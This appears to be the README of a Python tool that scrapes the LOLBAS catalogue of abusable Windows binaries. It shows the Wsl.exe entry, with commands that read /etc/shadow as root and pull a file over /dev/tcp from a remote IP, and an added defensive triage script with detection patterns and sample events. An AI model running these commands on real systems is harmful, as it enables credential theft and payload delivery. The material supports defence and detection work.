0bfxgh0st/lolbas-webcrawler

lolbas-webcrawler

Web scraper written in Python 3 to show LOLBAS entries in a terminal

┌──(root💀ghost)-[/home/ghost]
└─# python3 lolbas.py


.____    ________  .____   __________    _____    _________
|    |   \_____  \ |    |  \______   \  /  _  \  /   _____/
|    |    /   |   \|    |   |    |  _/ /  /_\  \ \_____  \ 
|    |___/    |    \    |___|    |   \/    |    \/        \
|_______ \_______  /_______ \______  /\____|__  /_______  /
        \/       \/        \/      \/         \/        \/ 

Living Off The Land Binaries, Scripts and Libraries
For more info on the project, click on the logo.

If you want to contribute, check out our contribution guide. Our criteria list sets out what we define as a LOLBin/Script/Lib.

MITRE ATT&CK® and ATT&CK® are registered trademarks of The MITRE Corporation. You can see the current ATT&CK® mapping of this project on the ATT&CK® Navigator.

If you are looking for UNIX binaries, please visit gtfobins.github.io.


[+] AppInstaller.exe
[+] Aspnet_Compiler.exe
[+] At.exe
[+] Atbroker.exe
[+] Bash.exe
[+] Bitsadmin.exe
[+] CertOC.exe
[+] CertReq.exe
[+] Certutil.exe
[+] Cmd.exe
[+] Cmdkey.exe
[+] cmdl32.exe
[+] Cmstp.exe
[+] ConfigSecurityPolicy.exe
[+] Conhost.exe
[+] Control.exe
[+] Csc.exe
[+] Cscript.exe
[+] CustomShellHost.exe
[+] DataSvcUtil.exe
[+] Desktopimgdownldr.exe
[+] DeviceCredentialDeployment.exe
[+] Dfsvc.exe
[+] Diantz.exe
[+] Diskshadow.exe
[+] Dnscmd.exe
[+] Esentutl.exe
[+] Eventvwr.exe
[+] Expand.exe
[+] Explorer.exe
[+] Extexport.exe
[+] Extrac32.exe
[+] Findstr.exe
[+] Finger.exe
[+] fltMC.exe
[+] Forfiles.exe
[+] Ftp.exe
[+] GfxDownloadWrapper.exe
[+] Gpscript.exe
[+] Hh.exe
[+] IMEWDBLD.exe
[+] Ie4uinit.exe
[+] Ieexec.exe
[+] Ilasm.exe
[+] Infdefaultinstall.exe
[+] Installutil.exe
[+] Jsc.exe
[+] Ldifde.exe
[+] Makecab.exe
[+] Mavinject.exe
[+] Microsoft.Workflow.Compiler.exe
[+] Mmc.exe
[+] MpCmdRun.exe
[+] Msbuild.exe
[+] Msconfig.exe
[+] Msdt.exe
[+] Mshta.exe
[+] Msiexec.exe
[+] Netsh.exe
[+] Odbcconf.exe
[+] OfflineScannerShell.exe
[+] OneDriveStandaloneUpdater.exe
[+] Pcalua.exe
[+] Pcwrun.exe
[+] Pktmon.exe
[+] Pnputil.exe
[+] Presentationhost.exe
[+] Print.exe
[+] PrintBrm.exe
[+] Psr.exe
[+] Rasautou.exe
[+] rdrleakdiag.exe
[+] Reg.exe
[+] Regasm.exe
[+] Regedit.exe
[+] Regini.exe
[+] Register-cimprovider.exe
[+] Regsvcs.exe
[+] Regsvr32.exe
[+] Replace.exe
[+] Rpcping.exe
[+] Rundll32.exe
[+] Runonce.exe
[+] Runscripthelper.exe
[+] Sc.exe
[+] Schtasks.exe
[+] Scriptrunner.exe
[+] Setres.exe
[+] SettingSyncHost.exe
[+] ssh.exe
[+] Stordiag.exe
[+] SyncAppvPublishingServer.exe
[+] Ttdinject.exe
[+] Tttracer.exe
[+] Unregmp2.exe
[+] vbc.exe
[+] Verclsid.exe
[+] Wab.exe
[+] winget.exe
[+] Wlrmdr.exe
[+] Wmic.exe
[+] WorkFolders.exe
[+] Wscript.exe
[+] Wsreset.exe
[+] wuauclt.exe
[+] Xwizard.exe
[+] fsutil.exe
[+] Advpack.dll
[+] Desk.cpl
[+] Dfshim.dll
[+] Ieadvpack.dll
[+] Ieframe.dll
[+] Mshtml.dll
[+] Pcwutl.dll
[+] Setupapi.dll
[+] Shdocvw.dll
[+] Shell32.dll
[+] Syssetup.dll
[+] Url.dll
[+] Zipfldr.dll
[+] Comsvcs.dll
[+] AccCheckConsole.exe
[+] adplus.exe
[+] AgentExecutor.exe
[+] Appvlp.exe
[+] Bginfo.exe
[+] Cdb.exe
[+] coregen.exe
[+] Createdump.exe
[+] csi.exe
[+] DefaultPack.EXE
[+] Devtoolslauncher.exe
[+] dnx.exe
[+] Dotnet.exe
[+] Dump64.exe
[+] Dxcap.exe
[+] Excel.exe
[+] Fsi.exe
[+] FsiAnyCpu.exe
[+] Mftrace.exe
[+] Msdeploy.exe
[+] MsoHtmEd.exe
[+] Mspub.exe
[+] msxsl.exe
[+] ntdsutil.exe
[+] Powerpnt.exe
[+] Procdump.exe
[+] ProtocolHandler.exe
[+] rcsi.exe
[+] Remote.exe
[+] Sqldumper.exe
[+] Sqlps.exe
[+] SQLToolsPS.exe
[+] Squirrel.exe
[+] te.exe
[+] Tracker.exe
[+] Update.exe
[+] VSIISExeLauncher.exe
[+] VisualUiaVerifyNative.exe
[+] vsjitdebugger.exe
[+] Wfc.exe
[+] Winword.exe
[+] Wsl.exe
[+] CL_LoadAssembly.ps1
[+] CL_Mutexverifiers.ps1
[+] CL_Invocation.ps1
[+] Manage-bde.wsf
[+] Pubprn.vbs
[+] Syncappvpublishingserver.vbs
[+] UtilityFunctions.ps1
[+] winrm.vbs
[+] Pester.bat

[(L0LBAS)]> Wsl.exe

[Execute]

Download

Windows subsystem for Linux executable

Paths:

C:\Windows\System32\wsl.exe

Resources:

https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules

Acknowledgements:

Alex Ionescu (@aionescu)

Matt (@NotoriousRebel1)

Asif Matadar (@d1r4c)

Detection:

Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_wsl_lolbin.yml

BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules

IOC: Child process from wsl.exe

[Execute]

wsl.exe -e /mnt/c/Windows/System32/calc.exe

wsl.exe -u root -e cat /etc/shadow

wsl.exe --exec bash -c 'cat file'

Download

wsl.exe --exec bash -c 'cat < /dev/tcp/192.168.1.10/54 > binary'

Or pass the entry name as an argument:

┌──(root💀ghost)-[/home/ghost]
└─# python3 lolbas.py Wsl.exe  

                                                                                                                                                                                                   
.____    ________  .____   __________    _____    _________
|    |   \_____  \ |    |  \______   \  /  _  \  /   _____/
|    |    /   |   \|    |   |    |  _/ /  /_\  \ \_____  \
|    |___/    |    \    |___|    |   \/    |    \/        \
|_______ \_______  /_______ \______  /\____|__  /_______  /
        \/       \/        \/      \/         \/        \/

Living Off The Land Binaries, Scripts and Libraries
For more info on the project, click on the logo.

If you want to contribute, check out our contribution guide. Our criteria list sets out what we define as a LOLBin/Script/Lib.

MITRE ATT&CK® and ATT&CK® are registered trademarks of The MITRE Corporation. You can see the current ATT&CK® mapping of this project on the ATT&CK® Navigator.

If you are looking for UNIX binaries, please visit gtfobins.github.io.

[Execute]

Download

Windows subsystem for Linux executable

Paths:

C:\Windows\System32\wsl.exe

Resources:

https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules

Acknowledgements:

Alex Ionescu (@aionescu)

Matt (@NotoriousRebel1)

Asif Matadar (@d1r4c)

Detection:

Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_wsl_lolbin.yml

BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules

IOC: Child process from wsl.exe

[Execute]

wsl.exe -e /mnt/c/Windows/System32/calc.exe

wsl.exe -u root -e cat /etc/shadow

wsl.exe --exec bash -c 'cat file'

Download

wsl.exe --exec bash -c 'cat < /dev/tcp/192.168.1.10/54 > binary'
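
The Detection section of the Wsl.exe entry lists "Child process from wsl.exe" as the IOC. The following is an added example, not part of lolbas.py or the LOLBAS project, showing how a defender could turn that IOC and the command-line shapes printed above into a triage check over process-creation events. It assumes Sysmon Event ID 1 field names (`Image`, `CommandLine`, `ParentImage`); the reason tags and the sample events are constructed for illustration.

```python
import re
from ntpath import basename  # parses Windows paths on any OS

# Patterns derived from the [Execute] and Download command lines shown above.
EXEC_FLAG = re.compile(r"(?:^|\s)(?:-e|--exec)(?:\s|$)")
ROOT_USER = re.compile(r"(?:^|\s)(?:-u|--user)\s+root(?:\s|$)")
DEV_TCP = re.compile(r"/dev/tcp/")


def is_wsl(image):
    return basename(image or "").lower() == "wsl.exe"


def classify(event):
    """Return the reasons a process-creation event deserves triage."""
    reasons = []
    cmd = event.get("CommandLine", "")
    if is_wsl(event.get("Image")):
        if EXEC_FLAG.search(cmd):
            reasons.append("exec-flag")
        if ROOT_USER.search(cmd):
            reasons.append("root-user")
        if DEV_TCP.search(cmd):
            reasons.append("dev-tcp-redirect")
    if is_wsl(event.get("ParentImage")):
        reasons.append("wsl-child")  # the IOC listed under Detection
    return reasons


def ev(image, cmd, parent):
    return {"Image": image, "CommandLine": cmd, "ParentImage": parent}


SYS32 = "C:\\Windows\\System32\\"
# Constructed events with Sysmon Event ID 1 field names (assumption); not real telemetry.
SAMPLE_EVENTS = [
    ev(SYS32 + "wsl.exe", "wsl.exe -e /mnt/c/Windows/System32/calc.exe", SYS32 + "cmd.exe"),
    ev(SYS32 + "wsl.exe", "wsl.exe -u root -e cat /etc/shadow", SYS32 + "cmd.exe"),
    ev(SYS32 + "wsl.exe", "wsl.exe --exec bash -c 'cat < /dev/tcp/192.168.1.10/54 > binary'", SYS32 + "cmd.exe"),
    ev(SYS32 + "calc.exe", "calc.exe", SYS32 + "wsl.exe"),
    ev(SYS32 + "wsl.exe", "wsl.exe --list --verbose", "C:\\Windows\\explorer.exe"),
    ev(SYS32 + "notepad.exe", "notepad.exe", "C:\\Windows\\explorer.exe"),
]

if __name__ == "__main__":
    for e in SAMPLE_EVENTS:
        print(f"{', '.join(classify(e)) or 'ok':32} {e['CommandLine']}")
```

On hosts where developers use WSL routinely, the `wsl-child` tag alone will be noisy; combining it with the command-line tags or an allowlist of expected parent processes keeps the alert volume manageable.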
